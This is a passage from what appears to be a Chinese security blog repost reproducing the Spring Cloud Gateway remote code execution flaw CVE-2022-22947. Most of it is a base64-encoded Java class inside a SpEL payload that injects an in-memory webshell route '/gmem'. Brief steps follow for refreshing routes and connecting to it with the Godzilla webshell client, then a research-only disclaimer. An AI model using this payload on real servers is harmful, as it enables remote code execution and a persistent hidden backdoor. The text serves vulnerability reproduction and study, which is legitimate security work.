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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/gmem')}"
}
}],
"uri": "http://test.com"
}
-
刷新路由
-
哥斯拉连接,路径为:http://127.0.0.1:8081/gmem/
选择Java类型,如果连接执行终端命令回显乱码可以将哥斯拉编码修改一下 (如果哥斯拉连接不上,就去用左后一个GET数据包访问一下文件)
利用成功
风吹化成雨
原文始发于微信公众号(朱厌安全):SpringBoot-GateWay-RCE (CVE-2022-22947) 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论